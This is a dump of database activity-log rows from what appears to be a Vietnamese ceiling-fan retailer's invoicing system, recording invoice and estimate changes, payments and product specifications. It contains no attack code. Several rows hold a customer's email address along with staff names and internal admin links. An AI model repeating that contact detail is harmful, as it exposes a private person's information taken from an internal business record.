(2481, 'invoice', 311, 'invoice_estimate_activity_updated_item_short_description', 'a:2:{i:0;s:53:\"Quạt trần 3 cánh gỗ PEARL 60 Màu Light Chery \";i:1;s:52:\"Quạt trần 3 cánh gỗ PEARL 60 Màu Light Chery\";}', '17', 'Loan Nguyễn', '2023-08-10 10:49:19'),
(2482, 'invoice', 326, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '17', 'Loan Nguyễn', '2023-08-10 11:06:54'),
(2483, 'invoice', 326, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:10:\"550.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/331\" target=\"_blank\">#331</a>\";}', '17', 'Loan Nguyễn', '2023-08-10 11:06:54'),
(2484, 'invoice', 328, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-08-10 11:10:29'),
(2485, 'invoice', 329, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-08-10 15:31:08'),
(2486, 'invoice', 329, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '17', 'Loan Nguyễn', '2023-08-10 15:31:12'),
(2487, 'invoice', 329, 'invoice_activity_marked_as_sent', 'a:0:{}', '17', 'Loan Nguyễn', '2023-08-10 15:31:12'),
(2488, 'invoice', 330, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-08-15 10:12:35'),
(2489, 'invoice', 330, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-08-15 10:12:35'),
(2490, 'invoice', 331, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-08-15 11:08:23'),
(2491, 'invoice', 331, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-08-15 11:08:27'),
(2492, 'invoice', 331, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:10:\"750.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/332\" target=\"_blank\">#332</a>\";}', '17', 'Loan Nguyễn', '2023-08-15 11:08:27'),
(2493, 'invoice', 328, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-08-17 09:32:52'),
(2494, 'invoice', 328, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:10:\"900.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/333\" target=\"_blank\">#333</a>\";}', '17', 'Loan Nguyễn', '2023-08-17 09:32:52'),
(2495, 'invoice', 326, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-08-17 09:34:41'),
(2496, 'invoice', 326, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:10:\"350.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/334\" target=\"_blank\">#334</a>\";}', '17', 'Loan Nguyễn', '2023-08-17 09:34:41'),
(2497, 'invoice', 318, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '[CRON]', '[CRON]', '2023-08-18 01:00:01'),
(2498, 'invoice', 332, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-08-18 16:43:21'),
(2499, 'invoice', 332, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:9:\"300000.00\";i:1;s:9:\"350000.00\";}', '17', 'Loan Nguyễn', '2023-08-18 16:44:03'),
(2500, 'invoice', 332, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '17', 'Loan Nguyễn', '2023-08-18 16:44:10'),
(2501, 'invoice', 332, 'invoice_activity_marked_as_sent', 'a:0:{}', '17', 'Loan Nguyễn', '2023-08-18 16:44:10'),
(2502, 'invoice', 333, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-08-18 16:49:03'),
(2503, 'invoice', 333, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:439:\"Sải cánh: 152cm (60 inch)   <br />\r\nChất liệu cánh: Gỗ tự nhiên (Maple Wood)   <br />\r\nĐộng cơ công suất 40W   <br />\r\nMóc treo quạt thiết kế loại áp sát trần - độ cao 30cm (dành cho trần thấp từ 2.8m - 3m)   <br />\r\nMàu thân: Trắng/Đen   <br />\r\nMàu cánh: Maple Wood   <br />\r\nĐiều khiển 5 tốc độ theo quạt   <br />\r\nThương hiệu: Tổ chức đào tạo WIT / China   <br />\r\n   <br />\r\n\";i:1;s:375:\"Sải cánh: 152cm (60 inch)   \r\nChất liệu cánh: Gỗ tự nhiên (Maple Wood)   \r\nĐộng cơ công suất 40W   \r\nMóc treo quạt thiết kế loại áp sát trần - độ cao 30cm (dành cho trần thấp từ 2.8m - 3m)   \r\nMàu thân: Trắng/Đen   \r\nMàu cánh: Maple Wood   \r\nĐiều khiển 5 tốc độ theo quạt   \r\nThương hiệu: Tổ chức đào tạo WIT / China\";}', '17', 'Loan Nguyễn', '2023-08-18 16:51:04'),
(2504, 'invoice', 333, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:39:\"Nhân công lắp đặt quạt trần \";}', '17', 'Loan Nguyễn', '2023-08-18 16:55:10'),
(2505, 'invoice', 333, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '17', 'Loan Nguyễn', '2023-08-18 16:55:14'),
(2506, 'invoice', 333, 'invoice_activity_marked_as_sent', 'a:0:{}', '17', 'Loan Nguyễn', '2023-08-18 16:55:14'),
(2507, 'invoice', 334, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-08-22 12:41:38'),
(2508, 'invoice', 334, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-08-22 16:00:05'),
(2509, 'invoice', 334, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:10:\"750.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/335\" target=\"_blank\">#335</a>\";}', '17', 'Loan Nguyễn', '2023-08-22 16:00:05'),
(2510, 'invoice', 332, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-08-22 16:00:58'),
(2511, 'invoice', 332, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:10:\"350.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/336\" target=\"_blank\">#336</a>\";}', '17', 'Loan Nguyễn', '2023-08-22 16:00:58'),
(2512, 'invoice', 333, 'invoice_estimate_activity_updated_item_short_description', 'a:2:{i:0;s:39:\"Nhân công lắp đặt quạt trần \";i:1;s:38:\"Nhân công lắp đặt quạt trần\";}', '1', 'Ho Gia Phat', '2023-08-23 08:37:30'),
(2513, 'invoice', 335, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-08-23 15:31:16'),
(2514, 'invoice', 335, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:316:\"Sải cánh 132cm ( ~ 52inch)     <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W     <br />\r\nMàu thân quạt: Matt Black(Đen sơn tĩnh điện)     <br />\r\nMàu cánh: Dark Wood     <br />\r\nĐèn LED: 3 màu, 2700K - 3000K     <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm \";i:1;s:285:\"Sải cánh 132cm ( ~ 52inch)     \r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W     \r\nMàu thân quạt: Matt Black(Đen sơn tĩnh điện)     \r\nMàu cánh: Dark Wood     \r\nĐèn LED: 3 màu, 2700K - 3000K     \r\nĐiều khiển từ xa 5 tốc độ đi kèm\";}', '17', 'Loan Nguyễn', '2023-08-23 15:32:43'),
(2515, 'invoice', 335, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:2:\"20\";i:1;s:2:\"25\";}', '17', 'Loan Nguyễn', '2023-08-23 15:32:43'),
(2516, 'invoice', 335, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '17', 'Loan Nguyễn', '2023-08-23 15:32:47'),
(2517, 'invoice', 335, 'invoice_activity_marked_as_sent', 'a:0:{}', '17', 'Loan Nguyễn', '2023-08-23 15:32:47'),
(2518, 'invoice', 333, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2023-08-24 06:32:47'),
(2519, 'invoice', 333, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"4.200.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/337\" target=\"_blank\">#337</a>\";}', '1', 'Ho Gia Phat', '2023-08-24 06:32:47'),
(2520, 'invoice', 329, 'invoice_activity_marked_as_cancelled', '', '1', 'Ho Gia Phat', '2023-08-24 06:33:22'),
(2521, 'invoice', 327, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-08-24 10:33:10'),
(2522, 'invoice', 327, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"16.450.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/338\" target=\"_blank\">#338</a>\";}', '17', 'Loan Nguyễn', '2023-08-24 10:33:10'),
(2523, 'invoice', 336, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-08-25 09:49:09'),
(2524, 'invoice', 336, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:329:\"Sải cánh 132cm ( ~ 52inch)   <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W   <br />\r\nMàu thân quạt: Brushed Nickel (Mạ chrome màu INox)   <br />\r\nMàu cánh: Gỗ sồi sáng (Maple Wood)   <br />\r\nĐèn LED: 3 màu, 2700K - 3000K   <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm \";i:1;s:298:\"Sải cánh 132cm ( ~ 52inch)   \r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W   \r\nMàu thân quạt: Brushed Nickel (Mạ chrome màu INox)   \r\nMàu cánh: Gỗ sồi sáng (Maple Wood)   \r\nĐèn LED: 3 màu, 2700K - 3000K   \r\nĐiều khiển từ xa 5 tốc độ đi kèm\";}', '17', 'Loan Nguyễn', '2023-08-25 09:50:37'),
(2525, 'invoice', 336, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:10:\"6300000.00\";i:1;s:10:\"4700000.00\";}', '17', 'Loan Nguyễn', '2023-08-25 09:50:37'),
(2526, 'invoice', 336, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:2:\"20\";i:1;s:0:\"\";}', '17', 'Loan Nguyễn', '2023-08-25 09:50:37'),
(2527, 'invoice', 336, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '17', 'Loan Nguyễn', '2023-08-25 09:50:40'),
(2528, 'invoice', 336, 'invoice_activity_marked_as_sent', 'a:0:{}', '17', 'Loan Nguyễn', '2023-08-25 09:50:40'),
(2529, 'invoice', 337, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-08-25 09:52:54'),
(2530, 'invoice', 337, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '17', 'Loan Nguyễn', '2023-08-25 09:54:08'),
(2531, 'invoice', 337, 'invoice_activity_marked_as_sent', 'a:0:{}', '17', 'Loan Nguyễn', '2023-08-25 09:54:08'),
(2532, 'invoice', 338, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-08-26 15:35:12'),
(2533, 'invoice', 339, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-08-28 14:22:58'),
(2534, 'invoice', 339, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-08-28 14:22:58'),
(2535, 'invoice', 323, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '[CRON]', '[CRON]', '2023-09-01 01:00:02'),
(2536, 'invoice', 325, 'activity_due_reminder_is_sent', 'a:2:{i:0;s:50:\"<custom_data>tuong.tran@tecon.com.vn</custom_data>\";i:1;s:1:\" \";}', '[CRON]', '[CRON]', '2023-09-01 01:00:06'),
(2537, 'invoice', 340, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2023-09-03 22:31:58'),
(2538, 'invoice', 325, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '[CRON]', '[CRON]', '2023-09-04 01:00:01'),
(2539, 'invoice', 325, 'user_sent_overdue_reminder', 'a:2:{i:0;s:50:\"<custom_data>tuong.tran@tecon.com.vn</custom_data>\";i:1;s:1:\" \";}', '[CRON]', '[CRON]', '2023-09-04 01:00:05'),
(2540, 'invoice', 304, 'invoice_estimate_activity_updated_item_short_description', 'a:2:{i:0;s:46:\"Quạt trần 5 cánh gỗ NEXUS 60 maple wood\";i:1;s:79:\"Quạt trần 5 cánh gỗ NEXUS 60 maple wood, thân trắng, cánh gỗ sáng\";}', '17', 'Loan Nguyễn', '2023-09-05 09:20:59'),
(2541, 'invoice', 304, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:409:\"Sải cánh: 152cm (60 inch)   <br />\r\nChất liệu cánh: Gỗ tự nhiên (Maple Wood)   <br />\r\nĐộng cơ công suất 40W   <br />\r\nMóc treo quạt thiết kế loại áp sát trần - độ cao 30cm (dành cho trần thấp từ 2.8m - 3m)   <br />\r\nMàu thân: Đen   <br />\r\nMàu cánh: Maple Wood   <br />\r\nĐiều khiển 5 tốc độ theo quạt   <br />\r\nThương hiệu: Tổ chức đào tạo WIT / China\";i:1;s:367:\"Sải cánh: 152cm (60 inch)   \r\nChất liệu cánh: Gỗ tự nhiên (Maple Wood)   \r\nĐộng cơ công suất 40W   \r\nMóc treo quạt thiết kế loại áp sát trần - độ cao 30cm (dành cho trần thấp từ 2.8m - 3m)   \r\nMàu thân: Trắng\r\nMàu cánh: Maple Wood   \r\nĐiều khiển 5 tốc độ theo quạt   \r\nThương hiệu: Tổ chức đào tạo WIT / China\";}', '17', 'Loan Nguyễn', '2023-09-05 09:20:59'),
(2542, 'invoice', 304, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:10:\"7900000.00\";i:1;s:10:\"5700000.00\";}', '17', 'Loan Nguyễn', '2023-09-05 09:20:59'),
(2543, 'invoice', 304, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:2:\"25\";i:1;s:0:\"\";}', '17', 'Loan Nguyễn', '2023-09-05 09:20:59'),
(2544, 'invoice', 304, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:10:\"5700000.00\";i:1;s:10:\"5800000.00\";}', '17', 'Loan Nguyễn', '2023-09-05 09:26:09'),
(2545, 'invoice', 325, 'user_sent_overdue_reminder', 'a:2:{i:0;s:50:\"<custom_data>tuong.tran@tecon.com.vn</custom_data>\";i:1;s:1:\" \";}', '[CRON]', '[CRON]', '2023-09-07 01:00:07'),
(2546, 'invoice', 304, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>4</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-09-08 12:17:36'),
(2547, 'invoice', 304, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"5.800.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/339\" target=\"_blank\">#339</a>\";}', '17', 'Loan Nguyễn', '2023-09-08 12:17:36'),
(2548, 'invoice', 338, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-09-08 12:18:52'),
(2549, 'invoice', 338, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:10:\"550.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/340\" target=\"_blank\">#340</a>\";}', '17', 'Loan Nguyễn', '2023-09-08 12:18:52'),
(2550, 'invoice', 325, 'user_sent_overdue_reminder', 'a:2:{i:0;s:50:\"<custom_data>tuong.tran@tecon.com.vn</custom_data>\";i:1;s:1:\" \";}', '[CRON]', '[CRON]', '2023-09-10 01:00:07'),
(2551, 'invoice', 341, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-09-11 10:14:31'),
(2552, 'invoice', 342, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-09-11 14:25:09'),
(2553, 'invoice', 342, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-09-11 14:25:46'),
(2554, 'invoice', 342, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"4.875.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/341\" target=\"_blank\">#341</a>\";}', '17', 'Loan Nguyễn', '2023-09-11 14:25:46'),
(2555, 'estimate', 227, 'estimate_activity_created', '', '17', 'Loan Nguyễn', '2023-09-11 14:31:20'),
(2556, 'estimate', 227, 'estimate_activity_marked', 'a:1:{i:0;s:18:\"<status>2</status>\";}', '17', 'Loan Nguyễn', '2023-09-11 14:31:32'),
(2557, 'invoice', 341, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-09-11 17:16:03'),
(2558, 'invoice', 341, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:10:\"350.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/342\" target=\"_blank\">#342</a>\";}', '17', 'Loan Nguyễn', '2023-09-11 17:16:03'),
(2559, 'invoice', 325, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>4</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-09-11 17:17:00'),
(2560, 'invoice', 325, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"4.050.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/343\" target=\"_blank\">#343</a>\";}', '17', 'Loan Nguyễn', '2023-09-11 17:17:00'),
(2561, 'invoice', 325, 'invoice_activity_record_payment_email_to_customer', 'a:1:{i:0;s:23:\"tuong.tran@tecon.com.vn\";}', '17', 'Loan Nguyễn', '2023-09-11 17:17:06'),
(2562, 'estimate', 227, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:10:\"8600000.00\";i:1;s:10:\"6200000.00\";}', '17', 'Loan Nguyễn', '2023-09-14 09:13:24'),
(2563, 'estimate', 227, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:787:\"Model: NW 1902 <br />\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. <br />\r\nBlades (Số cánh): 3 pcs <br />\r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) <br />\r\nDiameter (Sải cánh):  1.5 mét (60 inch)  <br />\r\nWeight * (Trọng lượng): 6.3 kg <br />\r\nSpeed (tốc độ quay): 197 RPM (speed at max) <br />\r\nWatts (công suất):  38 W (max) <br />\r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) <br />\r\nPower input (nguồn điện): 220-240 VAC <br />\r\nEnvironment (môi trường sử dụng): trong nhà (indoor) <br />\r\nWarranty (Bảo hành): 05 năm <br />\r\nThương hiệu: Tổ chức đào tạo WIT - Made in China <br />\r\nBộ điều khiển từ xa RF đi kèm \";i:1;s:708:\"Model: NW 1902 \r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. \r\nBlades (Số cánh): 3 pcs \r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) \r\nDiameter (Sải cánh):  1.5 mét (60 inch)  \r\nWeight * (Trọng lượng): 6.3 kg \r\nSpeed (tốc độ quay): 197 RPM (speed at max) \r\nWatts (công suất):  38 W (max) \r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) \r\nPower input (nguồn điện): 220-240 VAC \r\nEnvironment (môi trường sử dụng): trong nhà (indoor) \r\nWarranty (Bảo hành): 05 năm \r\nThương hiệu: Tổ chức đào tạo WIT - Made in China \r\nBộ điều khiển từ xa RF đi kèm\";}', '17', 'Loan Nguyễn', '2023-09-14 09:13:24'),
(2564, 'estimate', 227, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:10:\"6200000.00\";i:1;s:10:\"8600000.00\";}', '17', 'Loan Nguyễn', '2023-09-14 09:14:25'),
(2565, 'estimate', 227, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:10:\"8600000.00\";i:1;s:10:\"6200000.00\";}', '17', 'Loan Nguyễn', '2023-09-15 16:38:37'),
(2566, 'invoice', 343, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-09-15 16:38:45'),
(2567, 'estimate', 227, 'estimate_activity_converted', 'a:1:{i:0;s:76:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/343\">INV-DRAFT</a>\";}', '17', 'Loan Nguyễn', '2023-09-15 16:38:45'),
(2568, 'invoice', 343, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '17', 'Loan Nguyễn', '2023-09-15 16:39:06'),
(2569, 'invoice', 343, 'invoice_activity_marked_as_sent', 'a:0:{}', '17', 'Loan Nguyễn', '2023-09-15 16:39:06'),
(2570, 'estimate', 227, 'not_estimate_status_updated', 'a:2:{i:0;s:36:\"<original_status>4</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '1', 'Ho Gia Phat', '2023-09-16 13:41:35'),
(2571, 'invoice', 343, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-09-18 08:46:20'),
(2572, 'invoice', 343, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"6.700.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/344\" target=\"_blank\">#344</a>\";}', '17', 'Loan Nguyễn', '2023-09-18 08:46:20'),
(2573, 'estimate', 225, 'not_estimate_status_updated', 'a:2:{i:0;s:36:\"<original_status>4</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '1', 'Ho Gia Phat', '2023-09-20 11:08:54'),
(2574, 'estimate', 225, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:769:\"Model: NW 1902<br />\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. <br />\r\nBlades (Số cánh): 3 pcs <br />\r\nBlades Color : Maple Wood  - chất liệu gỗ tự nhiên nguyên khối) <br />\r\nDiameter (Sải cánh):  1.5 mét (60 inch)  <br />\r\nWeight * (Trọng lượng): 6.3 kg <br />\r\nSpeed (tốc độ quay): 197 RPM (speed at max) <br />\r\nWatts (công suất):  38 W (max) <br />\r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) <br />\r\nPower input (nguồn điện): 220-240 VAC <br />\r\nEnvironment (môi trường sử dụng): trong nhà (indoor) <br />\r\nWarranty (Bảo hành): 05 năm <br />\r\nThương hiệu: Tổ chức đào tạo WIT - Made in China <br />\r\nBộ điều khiển từ xa RF đi kèm \";i:1;s:690:\"Model: NW 1902\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. \r\nBlades (Số cánh): 3 pcs \r\nBlades Color : Maple Wood  - chất liệu gỗ tự nhiên nguyên khối) \r\nDiameter (Sải cánh):  1.5 mét (60 inch)  \r\nWeight * (Trọng lượng): 6.3 kg \r\nSpeed (tốc độ quay): 197 RPM (speed at max) \r\nWatts (công suất):  38 W (max) \r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) \r\nPower input (nguồn điện): 220-240 VAC \r\nEnvironment (môi trường sử dụng): trong nhà (indoor) \r\nWarranty (Bảo hành): 05 năm \r\nThương hiệu: Tổ chức đào tạo WIT - Made in China \r\nBộ điều khiển từ xa RF đi kèm\";}', '1', 'Ho Gia Phat', '2023-09-20 11:08:54'),
(2575, 'estimate', 225, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:786:\"Model: NW 1902<br />\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. <br />\r\nBlades (Số cánh): 3 pcs <br />\r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) <br />\r\nDiameter (Sải cánh):  1.5 mét (60 inch)  <br />\r\nWeight * (Trọng lượng): 6.3 kg <br />\r\nSpeed (tốc độ quay): 197 RPM (speed at max) <br />\r\nWatts (công suất):  38 W (max) <br />\r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) <br />\r\nPower input (nguồn điện): 220-240 VAC <br />\r\nEnvironment (môi trường sử dụng): trong nhà (indoor) <br />\r\nWarranty (Bảo hành): 05 năm <br />\r\nThương hiệu: Tổ chức đào tạo WIT - Made in China <br />\r\nBộ điều khiển từ xa RF đi kèm \";i:1;s:707:\"Model: NW 1902\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. \r\nBlades (Số cánh): 3 pcs \r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) \r\nDiameter (Sải cánh):  1.5 mét (60 inch)  \r\nWeight * (Trọng lượng): 6.3 kg \r\nSpeed (tốc độ quay): 197 RPM (speed at max) \r\nWatts (công suất):  38 W (max) \r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) \r\nPower input (nguồn điện): 220-240 VAC \r\nEnvironment (môi trường sử dụng): trong nhà (indoor) \r\nWarranty (Bảo hành): 05 năm \r\nThương hiệu: Tổ chức đào tạo WIT - Made in China \r\nBộ điều khiển từ xa RF đi kèm\";}', '1', 'Ho Gia Phat', '2023-09-20 11:08:54'),
(2576, 'estimate', 225, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:292:\"Sải cánh 132cm (52inch)    <br />\r\nĐộng cơ EC, công suất 20.9W    <br />\r\nMàu thân/cánh: Trắng  <br />\r\nĐiều khiển từ xa 7 cấp đi kèm <br />\r\nTuỳ chọn thêm: Đèn LED 2700K; Module 0-10V; Module WiFi (điều khiển qua APP) <br />\r\nThương hiệu: Haiku/USA \";i:1;s:261:\"Sải cánh 132cm (52inch)    \r\nĐộng cơ EC, công suất 20.9W    \r\nMàu thân/cánh: Trắng  \r\nĐiều khiển từ xa 7 cấp đi kèm \r\nTuỳ chọn thêm: Đèn LED 2700K; Module 0-10V; Module WiFi (điều khiển qua APP) \r\nThương hiệu: Haiku/USA\";}', '1', 'Ho Gia Phat', '2023-09-20 11:08:54'),
(2577, 'estimate', 225, 'invoice_estimate_activity_updated_item_short_description', 'a:2:{i:0;s:60:\"Chi phí sơn tĩnh điện thân quạt Pearl màu trắng \";i:1;s:59:\"Chi phí sơn tĩnh điện thân quạt Pearl màu trắng\";}', '1', 'Ho Gia Phat', '2023-09-20 11:08:54'),
(2578, 'estimate', 225, 'not_estimate_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '1', 'Ho Gia Phat', '2023-09-20 11:09:11'),
(2579, 'invoice', 323, 'invoice_estimate_activity_updated_item_short_description', 'a:2:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";i:1;s:39:\"Nhân công lắp đặt quạt trần \";}', '17', 'Loan Nguyễn', '2023-09-22 10:42:20'),
(2580, 'invoice', 335, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '[CRON]', '[CRON]', '2023-09-23 01:00:02'),
